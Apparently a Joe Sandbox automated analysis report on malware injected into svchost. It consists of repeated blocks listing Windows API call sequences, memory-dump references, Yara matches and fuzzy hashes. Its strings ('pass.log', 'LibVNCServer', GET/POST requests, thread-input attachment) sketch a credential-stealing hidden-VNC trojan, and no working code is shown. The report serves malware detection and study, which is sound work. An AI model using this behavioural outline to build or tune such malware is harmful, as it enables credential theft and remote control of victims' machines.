                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C761EA
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C761F1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76205
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C7621E
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02C7622C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocCloseProcesslstrcpynmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3057210225-0
                                                                                                                                                                                                                    • Opcode ID: 7bea04ede20f95714734c4022fbc73ad228c7d020ed77ea41a7ec876b47ed26c
                                                                                                                                                                                                                    • Instruction ID: 4f0b01245737fa7da752c37295db53623940fa9153e1b90dd3e3a415debeda5d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bea04ede20f95714734c4022fbc73ad228c7d020ed77ea41a7ec876b47ed26c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B114E31E815981BEB2B9774AC0DBDD779CEF5C704F1049E9EA49D7181D3B08A848B91
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 02C7C2C2
                                                                                                                                                                                                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C7C2D9
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7C2EF
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C7C300
                                                                                                                                                                                                                    • ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 02C7C317
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1270303404-0
                                                                                                                                                                                                                    • Opcode ID: ffefde84407ffa3bf936f714ec4d8c0ba9547b0d4e51b9316abd8307bece1bdc
                                                                                                                                                                                                                    • Instruction ID: fa5839e23e620cd07b6d641c22ee302d381c8dd328d23801ca2f16bbda693b11
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffefde84407ffa3bf936f714ec4d8c0ba9547b0d4e51b9316abd8307bece1bdc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB016D31A81658BBE721DB909D09FEABB7CAB05700F004685BE05A61C0DBB05B84CAA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(?,?,00000000,76233080,?,02C782BC,?,00000006,00000000), ref: 02C7D33C
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000005), ref: 02C7D353
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7D356
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000006,?,02C782BC), ref: 02C7D36D
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000003), ref: 02C7D372
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3855296974-0
                                                                                                                                                                                                                    • Opcode ID: 44198578d312c57fc9eb2ae3cdbaf9db90f23ab8b14fd1f3ee048e683ca965c8
                                                                                                                                                                                                                    • Instruction ID: ac6f0cea62db6b4614dbee0b083b0783286056901d2d81e97fb8edad2a23fa5b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44198578d312c57fc9eb2ae3cdbaf9db90f23ab8b14fd1f3ee048e683ca965c8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0F08276A807187FD622DB55EC88FABB7ACEFC8B60F014605F90497340CA70ED118AB0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7C33C
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C7C344
                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02C7C350
                                                                                                                                                                                                                    • SendMessageA.USER32(?,0000000D,?,?), ref: 02C7C361
                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02C7C36D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2643679612-0
                                                                                                                                                                                                                    • Opcode ID: dcb0cf830bf581fd3f1da6442162149c9e39e46a52e7eb12a6fd96775cb7a615
                                                                                                                                                                                                                    • Instruction ID: 959e801d460fe618b7d861801d82dddbef8d6917c6acba2e40b479354d5c2cc3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcb0cf830bf581fd3f1da6442162149c9e39e46a52e7eb12a6fd96775cb7a615
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65F03732680344BBD7115BA5EC8DF9BBF6CEB89761F004955FA05C7241C575DC118A70
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7D2FA
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C7D302
                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02C78F74,?,?,?,?,02C78500,?,?), ref: 02C7D314
                                                                                                                                                                                                                    • GetFocus.USER32 ref: 02C7D316
                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02C78F74,?,?,?,?,02C78500,?,?), ref: 02C7D323
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 968181190-0
                                                                                                                                                                                                                    • Opcode ID: 147987f55d11e5604dcac225d12b0c0a976c67476d363a4c1d756db7917f9057
                                                                                                                                                                                                                    • Instruction ID: 28bfdfac62720a456aaab90a63a047adc048fab3a29c7a037b15124af4f38da9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 147987f55d11e5604dcac225d12b0c0a976c67476d363a4c1d756db7917f9057
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05E0D832E80254BBD71257B6AC4DF9BBFACEB85761F100A95FA08C3241D575DC108AB0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strncpy.MSVCRT ref: 02C87461
                                                                                                                                                                                                                      • Part of subcall function 02C86DE0: fseek.MSVCRT ref: 02C86E04
                                                                                                                                                                                                                      • Part of subcall function 02C86DE0: fwrite.MSVCRT ref: 02C86E17
                                                                                                                                                                                                                    • fseek.MSVCRT ref: 02C873EA
                                                                                                                                                                                                                    • fread.MSVCRT ref: 02C87408
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: fseek$freadfwritestrncpy
                                                                                                                                                                                                                    • String ID: 7f1bf8b2
                                                                                                                                                                                                                    • API String ID: 3817246059-2242988197
                                                                                                                                                                                                                    • Opcode ID: a79c007313c34b4014313cf13caa20cf08d1be367463825b5006dbe7b7b136ba
                                                                                                                                                                                                                    • Instruction ID: b8e7cecda93eb0dead1d0f925f56b964769aedb0d50f87b117b0d37f1e7c93e9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a79c007313c34b4014313cf13caa20cf08d1be367463825b5006dbe7b7b136ba
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0631A479A006418FC731DB28D484B22FBE5EFC5218F288A9DD48587752E335E8C9CFA1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 02C7FEF3
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02C7FF02
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HeadersHttpRequest
                                                                                                                                                                                                                    • String ID: ($Accept-Encoding:
                                                                                                                                                                                                                    • API String ID: 1754618566-3981465706
                                                                                                                                                                                                                    • Opcode ID: 92cc8b8512d096f058db4953c44d0e11fec2a3b11213a36eb77430e54254dbda
                                                                                                                                                                                                                    • Instruction ID: 16e37e555267c3db740efa0454b5c3534b8a44a3dd256ca26184706643e49a1d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cc8b8512d096f058db4953c44d0e11fec2a3b11213a36eb77430e54254dbda
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E11FCB1904345AFD750DF29D880B6BBBE8EB88654F004A2EF959D3241D730D904CBA2
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfde3), ref: 02C8E1D7
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 02C8E240
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashExistsFile
                                                                                                                                                                                                                    • String ID: 7f1bfde3$pass.log
                                                                                                                                                                                                                    • API String ID: 1760361154-3631098846
                                                                                                                                                                                                                    • Opcode ID: 0f27a7be032a33f1b8d52846a28b0450dff6c1478a75e100e02a8c87b137c549
                                                                                                                                                                                                                    • Instruction ID: cde347b72a7618a63202c6e584855481142a0c40c80e2d4882351e2cace664e9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f27a7be032a33f1b8d52846a28b0450dff6c1478a75e100e02a8c87b137c549
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81112B715046994BC71A8B3CA8A86F7BFE49BC6304B24C6D5ECC987302EA308949C780
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59), ref: 02C89E47
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 02C89EB0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashExistsFile
                                                                                                                                                                                                                    • String ID: 7f1bfc59$pass.log
                                                                                                                                                                                                                    • API String ID: 1760361154-3278540732
                                                                                                                                                                                                                    • Opcode ID: be7b6c987aa3d220cdda1caf0a4590d45fe6b181e66e5c7acfde767982866702
                                                                                                                                                                                                                    • Instruction ID: 2add8cb599504d2a3b1d67521bf6efbf4b2cffcf118477a8d1f83b98a0b0296f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be7b6c987aa3d220cdda1caf0a4590d45fe6b181e66e5c7acfde767982866702
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C112B725046D54BD7168B6CA6A46F3BFE5DBD6305F24C6D8DCCA87300EA308949C780
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                                    • Opcode ID: 375dcdb8f9d8c053798a386486593617f9a7364776c0a6d9b002b71cefc70fbb
                                                                                                                                                                                                                    • Instruction ID: 32decc90f6327c08c48a5e4470352e3794319a5cb4ff2731381c70f0029124e5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 375dcdb8f9d8c053798a386486593617f9a7364776c0a6d9b002b71cefc70fbb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 110140B2A017925FD730DFA998A241BBAD57D8010C359893DD9DB87A04D332EA48D683
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: mallocrealloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 948496778-0
                                                                                                                                                                                                                    • Opcode ID: 617ddba0da475d12365199744d1ab891e5c667aa76b892f5b1f441804cd25320
                                                                                                                                                                                                                    • Instruction ID: 6cde7e2f18e87d6f173b652e2c6a1794951f391c4f574f69ca29a89e7ee0b19a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 617ddba0da475d12365199744d1ab891e5c667aa76b892f5b1f441804cd25320
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA91D072E402559FCF14CF68CD89BAA3BA6FF84305F1445BDED099B342D674A911CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: mallocrealloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 948496778-0
                                                                                                                                                                                                                    • Opcode ID: 3d40dffe10013fffd5ae44fd307643510c6ad2ac8a2ee88332ed811f9e5f3228
                                                                                                                                                                                                                    • Instruction ID: 4f4f3afa43a001937bef1278ed365547be65adbf3fd40dbb2645ab194026c166
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d40dffe10013fffd5ae44fd307643510c6ad2ac8a2ee88332ed811f9e5f3228
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD91E371E402168FDB14CF64DC90BEA7BA5EF84309F1445B9ED0A9B345D634AD12CBE1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: closesocket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2781271927-0
                                                                                                                                                                                                                    • Opcode ID: c3624851fb6fa9ff8d6a0b37a51e9ad6e4dd1301b963aaafc1a1860065f70463
                                                                                                                                                                                                                    • Instruction ID: 1f5c1bca1454f4497758cdfbd9b6462781be5221fc9b1ed8a8ef1214c8089ceb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3624851fb6fa9ff8d6a0b37a51e9ad6e4dd1301b963aaafc1a1860065f70463
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56510370140B019BCB65CF29C8887D6B7A6FBA5328F75CA1AC46B87294EF31E546CB50
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                                    • String ID: %s (%s)$LibVNCServer 0.9.7$unknown
                                                                                                                                                                                                                    • API String ID: 2111968516-696653274
                                                                                                                                                                                                                    • Opcode ID: 6f2b4592c0379c54cd2e22e6550db7af00e3b4b6c991f6b1c1509ecc040b68af
                                                                                                                                                                                                                    • Instruction ID: f3a6578cfe0d99802cf4209567976f5db84ca5528890942b20ec814025212247
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f2b4592c0379c54cd2e22e6550db7af00e3b4b6c991f6b1c1509ecc040b68af
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA41D631A0465A5FDF01CF28D9A8BE67BA5EF85305F0481F5DD0D9F206DB74A60ACBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C81152
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 02C8115E
                                                                                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000104), ref: 02C81175
                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02C81196
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ParentTextWindowmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4175915554-0
                                                                                                                                                                                                                    • Opcode ID: b74dd45d2e0e6feeb0b3e40701464a5f39917aee69e9e432651cfb3d86be10e1
                                                                                                                                                                                                                    • Instruction ID: 1c6e0f74244909d4871718247bf6364bebca429c8ae02ae73b286adc8dbb48c1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b74dd45d2e0e6feeb0b3e40701464a5f39917aee69e9e432651cfb3d86be10e1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA01D673F402146BDB10AE69ACC8EE7F39CAB54554F048376ED0CE3141EAB1DA5586E0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,?), ref: 02C87A23
                                                                                                                                                                                                                      • Part of subcall function 02C82CE0: GetProcessHeap.KERNEL32(00000008,02C7FB17,02C7FB03,?,02C87515,?,?,?), ref: 02C82CF1
                                                                                                                                                                                                                      • Part of subcall function 02C82CE0: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 02C82CF8
                                                                                                                                                                                                                      • Part of subcall function 02C82CE0: memset.MSVCRT ref: 02C82D08
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,?,?,02C7E885,?), ref: 02C87A3E
                                                                                                                                                                                                                      • Part of subcall function 02C8CBC0: memset.MSVCRT ref: 02C8CBE1
                                                                                                                                                                                                                      • Part of subcall function 02C8CBC0: StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02C8CC19
                                                                                                                                                                                                                      • Part of subcall function 02C8CBC0: PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8CC4D
                                                                                                                                                                                                                      • Part of subcall function 02C8CBC0: PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8CC83
                                                                                                                                                                                                                      • Part of subcall function 02C8CBC0: PathFileExistsA.SHLWAPI(00000000,7F1BFC0D), ref: 02C8CCC9
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B23
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B36
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B49
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92B77
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92BAD
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: CreateDirectoryA.KERNEL32(?,00000000,02CCAFC0), ref: 02C92BC2
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: GetLastError.KERNEL32 ref: 02C92BCC
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: IsUserAnAdmin.SHELL32 ref: 02C92BD4
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92BE5
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: SetLastError.KERNEL32(00000000), ref: 02C92BEC
                                                                                                                                                                                                                      • Part of subcall function 02C92AE0: SetCurrentDirectoryA.KERNEL32(?), ref: 02C92BF9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$Backslash$strstr$DirectoryErrorHeapLastmemset$AdminAllocCreateCurrentExistsFileFolderMakeProcessReadSystemUsermemcpy
                                                                                                                                                                                                                    • String ID: GET $POST
                                                                                                                                                                                                                    • API String ID: 633840608-2494278042
                                                                                                                                                                                                                    • Opcode ID: b333c78d3a20b6ffcc49741ddd97b3878b23029b73683a5636a6cd11ab24f6df
                                                                                                                                                                                                                    • Instruction ID: 454c8b4f1ef71aedd1db641b8b7ff59109e943cb5a645da23fe2aedae5e37bcd
